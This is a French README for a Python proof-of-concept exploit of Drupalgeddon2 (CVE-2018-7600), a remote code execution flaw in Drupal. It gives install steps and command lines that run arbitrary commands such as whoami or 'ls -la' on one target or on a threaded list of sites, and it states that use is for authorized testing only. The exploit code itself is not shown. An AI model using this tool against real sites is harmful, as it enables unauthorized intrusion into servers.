
Ce dépôt présente un Proof-of-Concept (PoC) entièrement développé en interne pour CVE-2018-7600, largement connu sous le nom de Drupalgeddon 2. Cette vulnérabilité critique dans le cœur de Drupal 7 et 8 permet l'exécution de code à distance (RCE), et le PoC démontre son exploitation de manière claire et pédagogique.
Ce dépôt contient un exploit de type preuve de concept basé sur Python pour la faille critique d'exécution de code à distance dans Drupal, connue sous le nom de Drupalgeddon2 (CVE-2018-7600). Ce script est conçu à des fins éducatives et pour être utilisé par des professionnels de la sécurité dans le cadre de scénarios de tests d'intrusion autorisés.
Cet outil est destiné uniquement à des fins légales et éthiques. Utiliser ce script sur un système sans autorisation explicite de son propriétaire est illégal. L'auteur et les contributeurs ne sont pas responsables de tout usage abusif ou dommage causé par ce script. Utilisez-le à vos propres risques.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
Le script propose plusieurs arguments en ligne de commande pour personnaliser son exécution.
Exploiter une cible unique avec la commande par défaut (whoami) :
python3 drupalgeddon2.py -t http://example.com
Exploiter une cible unique avec une commande personnalisée (par exemple, ls -la) :
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Analyser une liste de cibles à partir d'un fichier :
Créez un fichier nommé targets.txt avec une URL par ligne :
http://site1.com
https://site2.org
http://site3.net
Puis exécutez le script :
python3 drupalgeddon2.py -l targets.txt
Analyser une liste avec une commande personnalisée et un nombre de threads augmenté :
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Enregistrer la sortie dans un fichier journal :
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Option courte | Description | Défaut |
|---|
--target | -t | Une URL cible unique. | - |
--list | -l | Chemin vers un fichier contenant une liste d'URL cibles. | - |
--command | -c | La commande à exécuter sur la cible. | whoami |
--threads | -T | Nombre de threads simultanés à utiliser. | 5 |
--output | -o | Fichier dans lequel journaliser la sortie. | - |
--timeout | Délai d'expiration de la requête en secondes. | 15 |